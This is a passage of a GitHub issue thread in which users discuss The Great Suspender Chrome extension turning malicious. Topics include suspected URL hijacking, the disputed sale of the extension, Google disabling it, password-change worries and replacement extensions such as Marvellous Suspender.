get by mistyping popular URLs, designed to prey on people.</p> </blockquote> <p>I had something similar on a couple of occasions – seeing some sort of "You've won!" scam page instead of the intended website (which only displayed after reloading the page) – but I'm certain this happened also before installing TGS. I think it may have more to do with hacked servers than with the browser, esp. that I also experienced this yesterday when browsing from mobile.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/10689737?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="kashmirix picture"> <strong>kashmirix</strong> <span class="text-muted ml-1">on 17 Feb 2021</span> </div> <div class="col text-right"> 👎<span class="ml-2 mr-3">1</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <blockquote> <p>For several months, one out of every hunred or so URLs which I would <strong>type into the URL bar</strong> would randomly bring me to some ad-laden privacy nightmare style site - things you get by mistyping popular URLs, designed to prey on people.</p> </blockquote> <p>I had something similar on a couple of occasions – seeing some sort of "You've won!" scam page instead of the intended website (which only displayed after reloading the page) – but I'm certain this happened also before installing TGS. I think it may have more to do with hacked servers than with the browser, esp. that I also experienced this yesterday when browsing from mobile.</p> </blockquote> <p>In my specific case, I'm speaking specifically regarding desktop Chrome typed-URL hijacking. ESPECIALLY on mobile, misclicks/moved-item taps/adware/hijacks/whatever (especially when dealing with piracy-related items) happen due purely to the nature of mobile devices, their browsers' rendering engines, misleading links you can't verify before operating on, page load order tricks designed to move items, and a myriad other factors -- and is an entirely separate arena and topic material.</p> <p>To further define the behavior -- specifically at times that I KNOW I typed a domain name correctly, I'll be bounced to some random ad platform. I struggle for the word, but we all know the type of site I mean. I've verified rigorously that my DNS is clean - I run a local DNS caching server which is fed by DNS-over-TLS, and I hesitate to believe that I missed anything there. History in-browser indicates that I typed the correct URL, but the browser behaves as if it believes it was redirected by the properly-typed site itself -- however that's the deepest I was ever able to inspect. </p> <p>Regarding other plugins, the -only- three other plugins I used (aside from TGS) during the timeframe are uBlock Origin, Font Rendering Enhancer, and HTTPS Everywhere -- but like TGS until recently, their reputations have been clean to my knowledge.</p> <p>Has anyone else - using a desktop browser, with the TGS plugin and no other likely causes - had a similar experience?</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/42219549?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="codefaux picture"> <strong>codefaux</strong> <span class="text-muted ml-1">on 17 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">1</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>Yes, this is exactly the sort of behaviour that TGS could have exhibited. The code for this sort of request interception was present in the extension. It may still have been caused by something else, but it's definitely possible that it came from TGS.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/1663259?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="joepie91 picture"> <strong>joepie91</strong> <span class="text-muted ml-1">on 18 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">3</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p><strong>@codefaux</strong> </p> <blockquote> <p>...would randomly bring me to some ad-laden privacy nightmare style site - things you get by mistyping popular URLs, designed to prey on people.</p> </blockquote> <p>This itself is called <a rel="nofollow noopener" target="_blank" href="https://en.wikipedia.org/wiki/Typosquatting">typosquatting</a>. This is probably what you were experiencing, though to have it happen that often is pretty peculiar.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/32376686?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="TacoTheDank picture"> <strong>TacoTheDank</strong> <span class="text-muted ml-1">on 19 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">3</span> 😕<span class="ml-2 mr-3">1</span> 👎<span class="ml-2 mr-3">1</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <p>the conspiracy theory that there was no sale</p> </blockquote> <p>Is it a conspiracy theory? I see it as the only reasonable explanation. It was my first conclusion about 30 seconds after learning about all of this. Why? Because it looks exactly how I would imagine I'd do it if I were in his shoes, which I have been.</p> <p>Any reasonable developer with integrity who learned he accidentally sold his extension to a malicious person who took advantage of his million users would surely be pissed, get involved, and expose as much detail as legally possible. When my account was hacked and Russians published a malicious update to my extension, I was quick to notify users, was transparent about everything, wrote blog posts, Facebook posts, etc.</p> <p>In this case, the silence speaks volumes.</p> <p>Again, I have no direct evidence or proof of this. But I think the "no sale" theory should be the <strong>default</strong> until/unless proven otherwise. </p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/2974436?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="matt-kruse picture"> <strong>matt-kruse</strong> <span class="text-muted ml-1">on 19 Feb 2021</span> </div> <div class="col text-right"> ❤<span class="ml-2 mr-3">4</span> 👍<span class="ml-2 mr-3">3</span> 👎<span class="ml-2 mr-3">1</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <p>@codefaux</p> <blockquote> <p>...would randomly bring me to some ad-laden privacy nightmare style site - things you get by mistyping popular URLs, designed to prey on people.</p> </blockquote> <p>This itself is called <a rel="nofollow noopener" target="_blank" href="https://en.wikipedia.org/wiki/Typosquatting">typosquatting</a>. This is probably what you were experiencing, though to have it happen that often is pretty peculiar.</p> </blockquote> <p>No, this was about URL hijacking, not about cybersquatting. Please don't suggest people don't know what they type/paste in the URL field, even though they wrote that there were no typos.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/10689737?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="kashmirix picture"> <strong>kashmirix</strong> <span class="text-muted ml-1">on 20 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">1</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <blockquote> <blockquote> <p>For several months, one out of every hunred or so URLs which I would <strong>type into the URL bar</strong> would randomly bring me to some ad-laden privacy nightmare style site - things you get by mistyping popular URLs, designed to prey on people.</p> </blockquote> <p>I had something similar on a couple of occasions – seeing some sort of "You've won!" scam page instead of the intended website (which only displayed after reloading the page) – but I'm certain this happened also before installing TGS. I think it may have more to do with hacked servers than with the browser, esp. that I also experienced this yesterday when browsing from mobile.</p> </blockquote> <p>In my specific case, I'm speaking specifically regarding desktop Chrome typed-URL hijacking. ESPECIALLY on mobile, misclicks/moved-item taps/adware/hijacks/whatever (especially when dealing with piracy-related items) happen due purely to the nature of mobile devices, their browsers' rendering engines, misleading links you can't verify before operating on, page load order tricks designed to move items, and a myriad other factors -- and is an entirely separate arena and topic material.</p> <p>To further define the behavior -- specifically at times that I KNOW I typed a domain name correctly, I'll be bounced to some random ad platform. I struggle for the word, but we all know the type of site I mean. I've verified rigorously that my DNS is clean - I run a local DNS caching server which is fed by DNS-over-TLS, and I hesitate to believe that I missed anything there. History in-browser indicates that I typed the correct URL, but the browser behaves as if it believes it was redirected by the properly-typed site itself -- however that's the deepest I was ever able to inspect.</p> <p>Regarding other plugins, the -only- three other plugins I used (aside from TGS) during the timeframe are uBlock Origin, Font Rendering Enhancer, and HTTPS Everywhere -- but like TGS until recently, their reputations have been clean to my knowledge.</p> <p>Has anyone else - using a desktop browser, with the TGS plugin and no other likely causes - had a similar experience?</p> </blockquote> <p>I've had this exact experience re: seemingly random redirects on desktop chrome (which I hitherto assumed were just some hijacked sites or malicious ad code on said sites) although can't verify it wasn't due to other factors - I'm running uBlock origin, tabs outliner & Mybib but make no guarantees as to everything else being innocent. It happened infrequently enough that I can't tell if its stopped since dropping TGS (and thus if TGS may have been responsible).</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/32071009?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="JoshC8C7 picture"> <strong>JoshC8C7</strong> <span class="text-muted ml-1">on 21 Feb 2021</span> </div> <div class="col text-right"> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>Is it fixed now? My ram is high..</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/1968109?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="LiamKarlMitchell picture"> <strong>LiamKarlMitchell</strong> <span class="text-muted ml-1">on 27 Feb 2021</span> </div> <div class="col text-right"> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <p>Is it fixed now? My ram is high..</p> </blockquote> <p>Use MS Edge, it has suspending tabs implemented.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/6721083?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="makedir picture"> <strong>makedir</strong> <span class="text-muted ml-1">on 27 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">1</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <p>Is it fixed now? My ram is high..</p> </blockquote> <p><strong>@LiamKarlMitchell</strong> No it is not fixed, and will not be fixed. This was sold to an anonymous third party. Here's an alternative. <a rel="nofollow noopener" target="_blank" href="https://github.com/gioxx/MarvellousSuspender">https://github.com/gioxx/MarvellousSuspender</a> you can use in Chrome. </p> <p><strong>@makedir</strong> Edge may have tab suspension [discarding], but so does Chrome. The issue is that it's not good enough by default and does not offer the same kind of easy granular control.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/9877150?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="Technetium1 picture"> <strong>Technetium1</strong> <span class="text-muted ml-1">on 27 Feb 2021</span> </div> <div class="col text-right"> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>I started using Marvellous Suspender last night which cut it down from 90%+ RAM usage quite a bit yay.<br /> If Chrome built these features in as an option I would drop an extension for it in a heartbeat.</p> <p>I know some would say well dont open so many tabs you horder, but Its just how I am... So many for researching different things when I go off on some tangent then I forget about them for several weeks and come back to it.</p> <p>Sure there are Session Buddy and other extensions to save them but its more fiddly... tab suspension does a great job too.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/1968109?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="LiamKarlMitchell picture"> <strong>LiamKarlMitchell</strong> <span class="text-muted ml-1">on 28 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">2</span> 🚀<span class="ml-2 mr-3">1</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p><strong>@Technetium1</strong> What are you talking about, no, Chrome does not. MS implemented their own tab suspension some weeks ago which is good enough: <a rel="nofollow noopener" target="_blank" href="https://www.windowslatest.com/2020/09/17/microsoft-edge-sleeping-tabs-feature/">https://www.windowslatest.com/2020/09/17/microsoft-edge-sleeping-tabs-feature/</a></p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/6721083?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="makedir picture"> <strong>makedir</strong> <span class="text-muted ml-1">on 28 Feb 2021</span> </div> <div class="col text-right"> 👀<span class="ml-2 mr-3">1</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <p><strong>@Technetium1</strong> What are you talking about, no, Chrome does not. MS implemented their own tab suspension some weeks ago which is good enough: <a rel="nofollow noopener" target="_blank" href="https://www.windowslatest.com/2020/09/17/microsoft-edge-sleeping-tabs-feature/">windowslatest.com/2020/09/17/microsoft-edge-sleeping-tabs-feature</a></p> </blockquote> <p>This is not a good enough solution for people that don't want to use MS products, <em>and</em> there is no granular control. Take a look at <code>chrome://discards</code> and tell me it doesn't exist.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/9877150?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="Technetium1 picture"> <strong>Technetium1</strong> <span class="text-muted ml-1">on 28 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">1</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>No, it is good enough, all you need is a timer of n minutes to discards to set, what it is all about. The only thing you need. No option in Chrome means it has literally no function.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/6721083?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="makedir picture"> <strong>makedir</strong> <span class="text-muted ml-1">on 28 Feb 2021</span> </div> <div class="col text-right"> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>FWIW, I think <code>kill -9</code> actually reduces resource usage more than TGS. The difficulty is automating it.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/1095675?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="luke-jr picture"> <strong>luke-jr</strong> <span class="text-muted ml-1">on 28 Feb 2021</span> </div> <div class="col text-right"> 😄<span class="ml-2 mr-3">7</span> 👎<span class="ml-2 mr-3">4</span> ❤<span class="ml-2 mr-3">2</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>Can someone update me on whats the status here ? </p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/40552237?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="NotMoni picture"> <strong>NotMoni</strong> <span class="text-muted ml-1">on 8 Mar 2021</span> </div> <div class="col text-right"> 👎<span class="ml-2 mr-3">3</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p><strong>@NotMoni</strong> </p> <p>Unchanged. Please use The Marvelous Suspender instead. It is available on the chrome store. The great suspender will not be returning.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/13556193?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="TheMageKing picture"> <strong>TheMageKing</strong> <span class="text-muted ml-1">on 10 Mar 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">4</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <p>Can someone update me on whats the status here ?</p> </blockquote> <p>Just to make it clear for newcomers (at least until <strong>@greatsuspender</strong> says literally anything):</p> <p><strong>DO NOT USE THIS SOFTWARE; DAMAGE REPORT IS NOT EASILY AVAILABLE: EXPECT WORST CASE AND RESPOND APPROPRIATELY.</strong></p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/831537?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="aphix picture"> <strong>aphix</strong> <span class="text-muted ml-1">on 11 Mar 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">3</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>Can we add to this that you can use the marvelous suspender in the meantime. This project is deader than Monty pythons parrot.<br /> On 11. Mar 2021, 07:33 +0100, aphix <strong><em>@</em></strong>.<em>*</em>>, wrote:</p> <blockquote> <blockquote> <p>Can someone update me on whats the status here ?<br /> Just to make it clear for newcomers (at least until <strong>@greatsuspender</strong> says literally anything):<br /> DO NOT USE THIS SOFTWARE; DAMAGE REPORT IS NOT EASILY AVAILABLE: EXPECT WORST CASE AND RESPOND APPROPRIATELY.<br /> —<br /> You are receiving this because you were mentioned.<br /> Reply to this email directly, view it on GitHub, or unsubscribe.</p> </blockquote> </blockquote> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/827996?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="christhomas picture"> <strong>christhomas</strong> <span class="text-muted ml-1">on 11 Mar 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">2</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>TheGreatSuspecter</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/3431339?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="BaluErtl picture"> <strong>BaluErtl</strong> <span class="text-muted ml-1">on 16 Mar 2021</span> </div> <div class="col text-right"> 😄<span class="ml-2 mr-3">7</span> 😕<span class="ml-2 mr-3">1</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>Everyone please stop recommending the Marvelous Suspender from the Web Store: <a rel="nofollow noopener" target="_blank" href="https://github.com/greatsuspender/thegreatsuspender/issues/1336">https://github.com/greatsuspender/thegreatsuspender/issues/1336</a></p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/8780617?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="aleqx picture"> <strong>aleqx</strong> <span class="text-muted ml-1">on 21 Mar 2021</span> </div> <div class="col text-right"> 👎<span class="ml-2 mr-3">4</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>Why’s that alex?<br /> On 21. Mar 2021, 15:31 +0100, aleqx <strong><em>@</em></strong>.<em>*</em>>, wrote:</p> <blockquote> <p>Everyone please stop recommending the Marvelous Suspender from the Web Store: #1336<br /> —<br /> You are receiving this because you were mentioned.<br /> Reply to this email directly, view it on GitHub, or unsubscribe.</p> </blockquote> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/827996?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="christhomas picture"> <strong>christhomas</strong> <span class="text-muted ml-1">on 21 Mar 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">1</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <p>Why’s that alex?</p> </blockquote> <p><strong>@christhomas</strong> explained in the link included </p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/8780617?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="aleqx picture"> <strong>aleqx</strong> <span class="text-muted ml-1">on 21 Mar 2021</span> </div> <div class="col text-right"> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>Yes yes, extensions are bad, google web store is full of junk, blah blah. But people want this plugin and know what installing the plugin will do and what it gives the extension the capability to do.</p> <p>So with that in mind, we need to push an alternative that the community of users who are here agree is trustworthy and pick a successor. We mostly agree, but the Marvellous Suspender is that extension. (I think we all agree actually)</p> <p>Nobody is going to install this from GitHub, so our only alternative is to push the Marvellous Suspender instead. It's the best compromise between all the options that we have a reasonable choice from.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/827996?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="christhomas picture"> <strong>christhomas</strong> <span class="text-muted ml-1">on 21 Mar 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">4</span> 👎<span class="ml-2 mr-3">1</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>I've installed it from GitHub, and made it easy for anyone using Gentoo to do so.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/1095675?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="luke-jr picture"> <strong>luke-jr</strong> <span class="text-muted ml-1">on 21 Mar 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">1</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>Thank you for the summary, I wish I had been following the news to know about this sooner since I was using it on the work PC...</p> <p>Amen, time to change passwords i guess.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/6944931?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="elevul picture"> <strong>elevul</strong> <span class="text-muted ml-1">on 22 Mar 2021</span> </div> <div class="col text-right"> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>Did anyone do a log analysis to check whether the connection to owebanalytics.com is done through URL or directly through IP?</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/6944931?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="elevul picture"> <strong>elevul</strong> <span class="text-muted ml-1">on 22 Mar 2021</span> </div> <div class="col text-right"> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p><strong>@elevul</strong> It was done through URL.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/13556193?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="TheMageKing picture"> <strong>TheMageKing</strong> <span class="text-muted ml-1">on 22 Mar 2021</span> </div> <div class="col text-right"> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>Just got a notice from Google saying that 'The Great Suspender Is Malware And Has Been Disabled'.<br /> Began researching the issue and just now noticed that there's 7 months of people warning about the extension.<br /> I can't believe Google didn't act sooner on this. I use Chrome for all of my online business, purchases, banking, it has my social security number, etc.<br /> Is this confirmed to have logged all passwords? Is it limited to passwords, or could more identity information have been stolen?</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/84495705?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="timetopanic picture"> <strong>timetopanic</strong> <span class="text-muted ml-1">on 20 May 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">11</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <p>Just got a notice from Google saying that 'The Great Suspender Is Malware And Has Been Disabled'.<br /> Began researching the issue and just now noticed that there's 7 months of people warning about the extension.<br /> I can't believe Google didn't act sooner on this. I use Chrome for all of my online business, purchases, banking, it has my social security number, etc.<br /> Is this confirmed to have logged all passwords? Is it limited to passwords, or could more identity information have been stolen?</p> </blockquote> <p>Someone, please let us know if it's confirmed.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/40552237?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="NotMoni picture"> <strong>NotMoni</strong> <span class="text-muted ml-1">on 20 May 2021</span> </div> <div class="col text-right"> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <p>Just got a notice from Google saying that 'The Great Suspender Is Malware And Has Been Disabled'.<br /> Began researching the issue and just now noticed that there's 7 months of people warning about the extension.<br /> I can't believe Google didn't act sooner on this. I use Chrome for all of my online business, purchases, banking, it has my social security number, etc.<br /> Is this confirmed to have logged all passwords? Is it limited to passwords, or could more identity information have been stolen?</p> </blockquote> <p>Odd, how are there so many people only getting the extension disabled by Chrome now, and not months earlier like the rest of us? I wonder...</p> <p>As far as I'm aware, if nothing changed and no new info came out since this was last an issue reported on months back, there is no confirmation or actual evidence we have of any sensitive personal data being harvested from this extension. There were mechanisms in place that allowed for that kind of harvesting, but we have no proof or statements on whether it ever ended up happening, or even if there was only superficial, anonymous data that got collected. Data might have been collected, or it might not have, we simply still don't know.</p> <p>Basically, I'd say not to worry about it too much. Take standard precautions, reset any passwords you feel are too sensitive to even risk, and just stay aware for any unusual activity with your identity or online accounts. Odds are, nothing too bad has come out of this, in terms of private data being harvested. All this time passed, and nothing has happened yet (though obviously that doesn't preclude the possibility of something happening in the future with your data, but it is still a bit more reassuring to know the data harvested, if any, wasn't aggressively acted upon).</p> <p>If you need help restoring your old tabs, there are a number of great approaches people have come up with - <a rel="nofollow noopener" target="_blank" href="http://great-suspender-restore-urls.herokuapp.com/ui/about.html">here</a>'s one solid approach that works well. And some services even offer corrective measures for the issue, like Toby, which offers to auto-correct the URLs of all your suspended tabs you have bookmarked with them, which is a really awesome gesture that I can give props to dev teams like that for implementing. Saves everyone a ton of time and trouble.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/2044760?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="Koolstr picture"> <strong>Koolstr</strong> <span class="text-muted ml-1">on 20 May 2021</span> </div> <div class="col text-right"> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>I received no warning or notice from Chrome... it simply squashed all of my suspended tabs today without any notification. I'm one of those people that leaves tabs open on multiple computers for many months at a time. So I've lost all of that on 3 different devices. Thanks Google for the "graceful" way that this was handled. Taking a play from the Windows Updates playbook, I see.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/10358672?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="drullo picture"> <strong>drullo</strong> <span class="text-muted ml-1">on 20 May 2021</span> </div> <div class="col text-right"> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>Yeah, their disabling of extensions without a proper heads-up or means of preventing or stalling, much like the problematic way Windows Updates are handled, is something to be miffed by. Ironically, the auto-disabling of this specific extension fares worse than any other scenario I can think of, since it leads to an unpreventable, direct loss of data, causing massive damage and/or inconveniences for some users like me. Hopefully (though I highly doubt it), this will shed light on the flaws with such an approach, leading to an improved implementation that gives the user more control over their experience, which can help easily prevent devastating scenarios like this in the future.</p> <p>But no need to despair. There are good options for recovering your tabs, so it's worth reading through the thread to discover them all, or check out the one I recommended above.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/2044760?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="Koolstr picture"> <strong>Koolstr</strong> <span class="text-muted ml-1">on 20 May 2021</span> </div> <div class="col text-right"> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>Honestly I could not care less about the tabs - I had a general idea about what all of them were, and none were particularly important.<br /> The possible data breach is far more concerning to me. I have no idea what passwords were compromised and in what location - I have a rotation of 7-8 passwords that I use and I'm now wondering which of them have been compromised and where. I also am very concerned about personal information, like my SSN, being in the hands of some unknown entity.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/84495705?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="timetopanic picture"> <strong>timetopanic</strong> <span class="text-muted ml-1">on 20 May 2021</span> </div> <div class="col text-right"> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p><strong>@timetopanic</strong> I mean this in a helpful way: if you truly care about security as much as you just said you did, you might consider not using any chrome extensions whatsoever (except, maybe, those authored by Google). Every single extension that you use exposes you to this very same risk (a new owner coming in and modifying the code). It's not unique to TGS.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/4672664?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="RonRothman picture"> <strong>RonRothman</strong> <span class="text-muted ml-1">on 20 May 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">1</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <p>Honestly I could not care less about the tabs - I had a general idea about what all of them were, and none were particularly important.<br /> The possible data breach is far more concerning to me. I have no idea what passwords were compromised and in what location - I have a rotation of 7-8 passwords that I use and I'm now wondering which of them have been compromised and where. I also am very concerned about personal information, like my SSN, being in the hands of some unknown entity.</p> </blockquote> <p>If passwords were in fact compromised from this event, then likely all your passwords would be compromised and would need to be changed.</p> <p>I wouldn't be concerned at all about your private info falling into the wrong hands, even your SSN. All that info is so readily available and easily attainable anyway. SSN as a form of unique & secure ID is an absolute joke, especially given how we use it. In either case, your private info and SSN are already circulating on the dark web from countless other leaks in the past. You just have to be unlucky enough to end up targeted out of the whole batch, nothing you can do about any of this. I don't mean to freak out those who are security-obsessed, but what I'm saying basically is that there is no reason to stress yourself out extra over your personal info getting out. You simply need to maintain the same degree of awareness of looking out for potential identity theft as you would any other given day. </p> <p>TLDR; Don't worry about your personal info being leaked. If they want to use it, they almost certainly already have it.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/2044760?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="Koolstr picture"> <strong>Koolstr</strong> <span class="text-muted ml-1">on 20 May 2021</span> </div> <div class="col text-right"> 👎<span class="ml-2 mr-3">2</span> </div> </div> </div> </div> <div 